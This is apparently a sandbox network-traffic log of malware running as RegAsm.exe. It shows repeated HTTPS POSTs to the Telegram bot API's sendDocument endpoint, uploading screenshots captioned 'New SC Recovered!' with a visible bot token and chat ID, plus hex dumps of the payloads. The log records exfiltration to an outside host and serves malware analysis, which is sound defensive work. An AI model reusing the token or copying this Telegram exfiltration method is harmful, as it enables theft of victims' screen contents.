2024-10-03 07:19:39 UTC	16355	OUT	Data Raw: 45 27 e1 52 30 cf d6 93 9a 5a 4a 06 14 86 94 d2 52 18 94 66 8a 43 48 61 45 14 50 02 7e 14 51 49 48 62 fd 69 28 a5 a0 0e 9e 8a 28 ac cf 0c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 ea 35 5d 32 7d 5b 40 b2 b7 b7 78 d5 97 63 92 e4 81 8d 84 76 07 d6 b0 bf e1 0c d4 bf e7 bd af fd f4 df fc 4d 6e 5b 78 86 ca 1b 58 62 64 98 b2 22 a9 c2 8c 64 0c 7a d4 9f f0 92 d8 ff 00 cf 3b 8f fb e4 7f 8d 78 d4 e7 88 a7 1e 58 c5 fd c7 d4 54 fa ad 49 73 4a 6b ef 47 3f ff 00 08 6e a4 3f e5 bd af fd f6 df fc 4d 6d e9 ba 64 fa 57 87 6f a0 b8 78 d9 98 48 e0 a1 24 63 60 1d c0 f4 a9 7f e1 25 b1 ff 00 9e 57 1f f7 ca ff 00 8d 43 77 e2 1b 39 ac e7 85 22 9c 34 91 b2 8c aa e3 24 63 d6 8a 93 c4 54 8f 2c a2 fe e0 a7 f5 5a 72 e6 8c d7 de 8e 6a 8a 28 af 64 f9 80 a4 a5 a2 80 12 Data Ascii: E'R0ZJRfCHaEP~QIHbi(((((((5]2}[@xcvMn[xXbd"dz;xXTIsJkG?n?MmdWoxH$c`%WCw9"4$cT,Zrj(d
2024-10-03 07:19:39 UTC	15447	OUT	Data Raw: 8f 89 22 b4 23 e5 fb 39 90 1f 7c 90 7f a5 68 01 12 5a 91 08 41 18 53 80 98 c7 e9 50 3c 30 7f 69 0b 86 51 e7 08 b6 86 cf 38 c9 e2 b6 95 45 29 39 35 dc e9 e4 b4 52 46 2f 8b 3f d7 5b 7f ba df d2 b9 fa e8 3c 59 fe ba db fd d6 fe 95 cf d7 ad 84 fe 0c 7f ae a7 cd 66 1f ef 32 f9 7e 48 28 a2 8a e9 38 82 b2 e6 99 ad b5 65 9d 3e f4 4e ae 3e a3 06 b5 2a 09 ad a1 90 b3 b2 65 b1 d7 26 a6 5b 3b 9d 38 5a 8a 15 35 ea 68 5f f8 9e de 6d 73 4f bc b6 8a 54 82 d8 b1 65 60 03 1d c7 e6 c0 cf a5 65 78 8b 53 8b 55 d4 fc f8 11 92 14 8d 63 45 60 01 00 7b 0f 72 6b b9 ff 00 84 53 43 ff 00 9f 1f fc 8a ff 00 e3 4a 3c 2b a1 82 08 b1 1c 7a c8 e7 fa d7 9b 1c 45 18 34 d2 7a 1f 47 2a 55 25 a3 68 92 f7 4a 6b 9b a7 98 26 9a 43 63 99 ac bc c7 e9 8e 5b 78 cf e5 52 69 da 6b 59 ce d2 14 b0 19 5d Data Ascii: "#9\|hZASP<0iQ8E)95RF/?[<Yf2~H(8e>N>e&[;8Z5h_msOTe`exSUcE`{rkSCJ<+zE4zGU%hJk&Cc[xRikY]
2024-10-03 07:19:39 UTC	603	OUT	Data Raw: 5c 4b 7a d1 de 5f 5a af ef 31 b5 4a 0e ab 8c e4 92 32 32 73 9c e2 b9 ad 7e 09 6d b5 eb e8 66 9f cf 95 66 6d f2 ed db bc e7 93 81 d2 a1 b7 d4 b5 0b 59 a4 9a da fa e6 19 65 e6 47 8e 56 56 7e 73 c9 07 9a ac ee f2 3b 3b b1 67 63 96 66 39 24 fa 9a 2c 02 57 53 e1 b9 2e 2d b4 b8 a5 b1 2e b3 cb a9 45 0c 9b 3a b2 6d 38 53 ea 09 ce 47 7c 57 2d 53 da de dd d9 ef fb 2d d4 d0 79 8b b5 fc a9 0a ee 1e 87 1d 45 0c 0e a2 46 79 6c 35 ad 3a de e2 59 12 2c b4 56 b2 2e 22 8e 31 2e 43 46 46 72 c7 20 72 17 86 3c 9a 4b 1b a7 b2 f1 66 93 a6 40 c8 52 d5 d2 07 25 15 be 76 60 64 23 23 83 9e 32 39 c0 ae 7a 2d 5b 52 8a 38 62 4b e9 fc 98 58 3c 71 33 96 8d 48 39 07 69 e3 af b5 56 59 e6 4b 81 70 92 ba cc 1b 78 90 31 0c 1b d7 3e b4 58 77 3b 2d 15 9d 20 d2 a0 8c b0 b5 bb 92 e8 5e 28 fb ae Data Ascii: \Kz_Z1J22s~mffmYeGVV~s;;gcf9$,WS.-.E:m8SG\|W-S-yEFyl5:Y,V."1.CFFr r<Kf@R%v`d##29z-[R8bKX<q3H9iVYKpx1>Xw;- ^(
2024-10-03 07:19:39 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 63 34 64 64 39 35 64 31 31 32 62 2d 2d 0d 0a Data Ascii: -----------------------------8dd0c4dd95d112b--
2024-10-03 07:19:39 UTC	402	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:19:39 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Logged out"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49722	149.154.167.220	443	3508	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:20:24 UTC	262	OUT	POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd1d119704835b Host: api.telegram.org Content-Length: 66210 Expect: 100-continue Connection: Keep-Alive
2024-10-03 07:20:25 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 07:20:25 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 64 31 31 39 37 30 34 38 33 35 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 32 38 38 38 38 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 64 31 31 39 37 30 34 38 33 35 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 31 35 2f 32 30 32 34 20 31 33 3a 35 35 3a 35 31 0a 55 73 65 72 Data Ascii: -----------------------------8dd1d119704835bContent-Disposition: form-data; name="chat_id"5928888099-----------------------------8dd1d119704835bContent-Disposition: form-data; name="caption"New SC Recovered!Time: 12/15/2024 13:55:51User
2024-10-03 07:20:25 UTC	16355	OUT	Data Raw: 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|T
2024-10-03 07:20:25 UTC	16355	OUT	Data Raw: ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62 8a ec c3 50 74 53 4d ee 79 f8 cc 4a c4 49 34 ad 60 a2 8a 2b a8 e3 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 b4 94 00 51 45 14 Data Ascii: +?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS\|\+=(?O??qpbPtSMyJI4`+((JZ((((((QEJ)hZJ(JZJQE0(ZJQEQE
2024-10-03 07:20:25 UTC	16355	OUT	Data Raw: 45 27 e1 52 30 cf d6 93 9a 5a 4a 06 14 86 94 d2 52 18 94 66 8a 43 48 61 45 14 50 02 7e 14 51 49 48 62 fd 69 28 a5 a0 0e 9e 8a 28 ac cf 0c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 ea 35 5d 32 7d 5b 40 b2 b7 b7 78 d5 97 63 92 e4 81 8d 84 76 07 d6 b0 bf e1 0c d4 bf e7 bd af fd f4 df fc 4d 6e 5b 78 86 ca 1b 58 62 64 98 b2 22 a9 c2 8c 64 0c 7a d4 9f f0 92 d8 ff 00 cf 3b 8f fb e4 7f 8d 78 d4 e7 88 a7 1e 58 c5 fd c7 d4 54 fa ad 49 73 4a 6b ef 47 3f ff 00 08 6e a4 3f e5 bd af fd f6 df fc 4d 6d e9 ba 64 fa 57 87 6f a0 b8 78 d9 98 48 e0 a1 24 63 60 1d c0 f4 a9 7f e1 25 b1 ff 00 9e 57 1f f7 ca ff 00 8d 43 77 e2 1b 39 ac e7 85 22 9c 34 91 b2 8c aa e3 24 63 d6 8a 93 c4 54 8f 2c a2 fe e0 a7 f5 5a 72 e6 8c d7 de 8e 6a 8a 28 af 64 f9 80 a4 a5 a2 80 12 Data Ascii: E'R0ZJRfCHaEP~QIHbi(((((((5]2}[@xcvMn[xXbd"dz;xXTIsJkG?n?MmdWoxH$c`%WCw9"4$cT,Zrj(d
2024-10-03 07:20:25 UTC	15447	OUT	Data Raw: 8f 89 22 b4 23 e5 fb 39 90 1f 7c 90 7f a5 68 01 12 5a 91 08 41 18 53 80 98 c7 e9 50 3c 30 7f 69 0b 86 51 e7 08 b6 86 cf 38 c9 e2 b6 95 45 29 39 35 dc e9 e4 b4 52 46 2f 8b 3f d7 5b 7f ba df d2 b9 fa e8 3c 59 fe ba db fd d6 fe 95 cf d7 ad 84 fe 0c 7f ae a7 cd 66 1f ef 32 f9 7e 48 28 a2 8a e9 38 82 b2 e6 99 ad b5 65 9d 3e f4 4e ae 3e a3 06 b5 2a 09 ad a1 90 b3 b2 65 b1 d7 26 a6 5b 3b 9d 38 5a 8a 15 35 ea 68 5f f8 9e de 6d 73 4f bc b6 8a 54 82 d8 b1 65 60 03 1d c7 e6 c0 cf a5 65 78 8b 53 8b 55 d4 fc f8 11 92 14 8d 63 45 60 01 00 7b 0f 72 6b b9 ff 00 84 53 43 ff 00 9f 1f fc 8a ff 00 e3 4a 3c 2b a1 82 08 b1 1c 7a c8 e7 fa d7 9b 1c 45 18 34 d2 7a 1f 47 2a 55 25 a3 68 92 f7 4a 6b 9b a7 98 26 9a 43 63 99 ac bc c7 e9 8e 5b 78 cf e5 52 69 da 6b 59 ce d2 14 b0 19 5d Data Ascii: "#9\|hZASP<0iQ8E)95RF/?[<Yf2~H(8e>N>e&[;8Z5h_msOTe`exSUcE`{rkSCJ<+zE4zGU%hJk&Cc[xRikY]
2024-10-03 07:20:25 UTC	624	OUT	Data Raw: b3 91 b4 b4 32 14 24 7a 64 52 03 ae bd 8e f3 48 b7 24 df 4d 15 c4 b7 ad 1d e5 f5 aa fe f3 1b 54 a0 ea b8 ce 49 23 23 27 39 ce 2b 9a d7 e0 96 db 5e be 86 69 fc f9 56 66 df 2e dd bb ce 79 38 1d 2a 1b 7d 4b 50 b5 9a 49 ad af ae 61 96 5e 64 78 e5 65 67 e7 3c 90 79 aa ce ef 23 b3 bb 16 76 39 66 63 92 4f a9 a2 c0 25 75 3e 1b 92 e2 db 4b 8a 5b 12 eb 3c ba 94 50 c9 b3 ab 26 d3 85 3e a0 9c e4 77 c5 72 d5 3d ad ed dd 9e ff 00 b2 dd 4d 07 98 bb 5f ca 90 ae e1 e8 71 d4 50 c0 ea 24 67 96 c3 5a d3 ad ee 25 91 22 cb 45 6b 22 e2 28 e3 12 e4 34 64 67 2c 72 07 21 78 63 c9 a4 b1 ba 7b 2f 16 69 3a 64 0c 85 2d 5d 20 72 51 5b e7 66 06 42 32 38 39 e3 23 9c 0a e7 a2 d5 b5 28 a3 86 24 be 9f c9 85 83 c7 13 39 68 d4 83 90 76 9e 3a fb 55 65 9e 64 b8 17 09 2b ac c1 b7 89 03 10 c1 bd Data Ascii: 2$zdRH$MTI##'9+^iVf.y8*}KPIa^dxeg<y#v9fcO%u>K[<P&>wr=M_qP$gZ%"Ek"(4dg,r!xc{/i:d-] rQ[fB289#($9hv:Ued+
2024-10-03 07:20:25 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 64 31 31 39 37 30 34 38 33 35 62 2d 2d 0d 0a Data Ascii: -----------------------------8dd1d119704835b--
2024-10-03 07:20:25 UTC	402	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:20:25 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Logged out"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49723	149.154.167.220	443	3508	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:20:34 UTC	262	OUT	POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd220c2c8aed8d Host: api.telegram.org Content-Length: 66210 Expect: 100-continue Connection: Keep-Alive
2024-10-03 07:20:34 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 07:20:34 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 30 63 32 63 38 61 65 64 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 32 38 38 38 38 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 30 63 32 63 38 61 65 64 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 32 31 2f 32 30 32 34 20 32 31 3a 35 39 3a 34 31 0a 55 73 65 72 Data Ascii: -----------------------------8dd220c2c8aed8dContent-Disposition: form-data; name="chat_id"5928888099-----------------------------8dd220c2c8aed8dContent-Disposition: form-data; name="caption"New SC Recovered!Time: 12/21/2024 21:59:41User
2024-10-03 07:20:34 UTC	16355	OUT	Data Raw: 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|T
2024-10-03 07:20:34 UTC	16355	OUT	Data Raw: ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62 8a ec c3 50 74 53 4d ee 79 f8 cc 4a c4 49 34 ad 60 a2 8a 2b a8 e3 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 b4 94 00 51 45 14 Data Ascii: +?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS\|\+=(?O??qpbPtSMyJI4`+((JZ((((((QEJ)hZJ(JZJQE0(ZJQEQE
2024-10-03 07:20:34 UTC	16355	OUT	Data Raw: 45 27 e1 52 30 cf d6 93 9a 5a 4a 06 14 86 94 d2 52 18 94 66 8a 43 48 61 45 14 50 02 7e 14 51 49 48 62 fd 69 28 a5 a0 0e 9e 8a 28 ac cf 0c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 ea 35 5d 32 7d 5b 40 b2 b7 b7 78 d5 97 63 92 e4 81 8d 84 76 07 d6 b0 bf e1 0c d4 bf e7 bd af fd f4 df fc 4d 6e 5b 78 86 ca 1b 58 62 64 98 b2 22 a9 c2 8c 64 0c 7a d4 9f f0 92 d8 ff 00 cf 3b 8f fb e4 7f 8d 78 d4 e7 88 a7 1e 58 c5 fd c7 d4 54 fa ad 49 73 4a 6b ef 47 3f ff 00 08 6e a4 3f e5 bd af fd f6 df fc 4d 6d e9 ba 64 fa 57 87 6f a0 b8 78 d9 98 48 e0 a1 24 63 60 1d c0 f4 a9 7f e1 25 b1 ff 00 9e 57 1f f7 ca ff 00 8d 43 77 e2 1b 39 ac e7 85 22 9c 34 91 b2 8c aa e3 24 63 d6 8a 93 c4 54 8f 2c a2 fe e0 a7 f5 5a 72 e6 8c d7 de 8e 6a 8a 28 af 64 f9 80 a4 a5 a2 80 12 Data Ascii: E'R0ZJRfCHaEP~QIHbi(((((((5]2}[@xcvMn[xXbd"dz;xXTIsJkG?n?MmdWoxH$c`%WCw9"4$cT,Zrj(d
2024-10-03 07:20:34 UTC	15447	OUT	Data Raw: 8f 89 22 b4 23 e5 fb 39 90 1f 7c 90 7f a5 68 01 12 5a 91 08 41 18 53 80 98 c7 e9 50 3c 30 7f 69 0b 86 51 e7 08 b6 86 cf 38 c9 e2 b6 95 45 29 39 35 dc e9 e4 b4 52 46 2f 8b 3f d7 5b 7f ba df d2 b9 fa e8 3c 59 fe ba db fd d6 fe 95 cf d7 ad 84 fe 0c 7f ae a7 cd 66 1f ef 32 f9 7e 48 28 a2 8a e9 38 82 b2 e6 99 ad b5 65 9d 3e f4 4e ae 3e a3 06 b5 2a 09 ad a1 90 b3 b2 65 b1 d7 26 a6 5b 3b 9d 38 5a 8a 15 35 ea 68 5f f8 9e de 6d 73 4f bc b6 8a 54 82 d8 b1 65 60 03 1d c7 e6 c0 cf a5 65 78 8b 53 8b 55 d4 fc f8 11 92 14 8d 63 45 60 01 00 7b 0f 72 6b b9 ff 00 84 53 43 ff 00 9f 1f fc 8a ff 00 e3 4a 3c 2b a1 82 08 b1 1c 7a c8 e7 fa d7 9b 1c 45 18 34 d2 7a 1f 47 2a 55 25 a3 68 92 f7 4a 6b 9b a7 98 26 9a 43 63 99 ac bc c7 e9 8e 5b 78 cf e5 52 69 da 6b 59 ce d2 14 b0 19 5d Data Ascii: "#9\|hZASP<0iQ8E)95RF/?[<Yf2~H(8e>N>e&[;8Z5h_msOTe`exSUcE`{rkSCJ<+zE4zGU%hJk&Cc[xRikY]
2024-10-03 07:20:34 UTC	624	OUT	Data Raw: b3 91 b4 b4 32 14 24 7a 64 52 03 ae bd 8e f3 48 b7 24 df 4d 15 c4 b7 ad 1d e5 f5 aa fe f3 1b 54 a0 ea b8 ce 49 23 23 27 39 ce 2b 9a d7 e0 96 db 5e be 86 69 fc f9 56 66 df 2e dd bb ce 79 38 1d 2a 1b 7d 4b 50 b5 9a 49 ad af ae 61 96 5e 64 78 e5 65 67 e7 3c 90 79 aa ce ef 23 b3 bb 16 76 39 66 63 92 4f a9 a2 c0 25 75 3e 1b 92 e2 db 4b 8a 5b 12 eb 3c ba 94 50 c9 b3 ab 26 d3 85 3e a0 9c e4 77 c5 72 d5 3d ad ed dd 9e ff 00 b2 dd 4d 07 98 bb 5f ca 90 ae e1 e8 71 d4 50 c0 ea 24 67 96 c3 5a d3 ad ee 25 91 22 cb 45 6b 22 e2 28 e3 12 e4 34 64 67 2c 72 07 21 78 63 c9 a4 b1 ba 7b 2f 16 69 3a 64 0c 85 2d 5d 20 72 51 5b e7 66 06 42 32 38 39 e3 23 9c 0a e7 a2 d5 b5 28 a3 86 24 be 9f c9 85 83 c7 13 39 68 d4 83 90 76 9e 3a fb 55 65 9e 64 b8 17 09 2b ac c1 b7 89 03 10 c1 bd Data Ascii: 2$zdRH$MTI##'9+^iVf.y8*}KPIa^dxeg<y#v9fcO%u>K[<P&>wr=M_qP$gZ%"Ek"(4dg,r!xc{/i:d-] rQ[fB289#($9hv:Ued+
2024-10-03 07:20:34 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 30 63 32 63 38 61 65 64 38 64 2d 2d 0d 0a Data Ascii: -----------------------------8dd220c2c8aed8d--
2024-10-03 07:20:35 UTC	402	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:20:35 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Logged out"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49724	149.154.167.220	443	3508	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:20:36 UTC	262	OUT	POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd2451751cb897 Host: api.telegram.org Content-Length: 66210 Expect: 100-continue Connection: Keep-Alive
2024-10-03 07:20:36 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 07:20:36 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 35 31 37 35 31 63 62 38 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 32 38 38 38 38 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 35 31 37 35 31 63 62 38 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 32 34 2f 32 30 32 34 20 31 39 3a 33 30 3a 33 34 0a 55 73 65 72 Data Ascii: -----------------------------8dd2451751cb897Content-Disposition: form-data; name="chat_id"5928888099-----------------------------8dd2451751cb897Content-Disposition: form-data; name="caption"New SC Recovered!Time: 12/24/2024 19:30:34User
2024-10-03 07:20:36 UTC	16355	OUT	Data Raw: 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|T
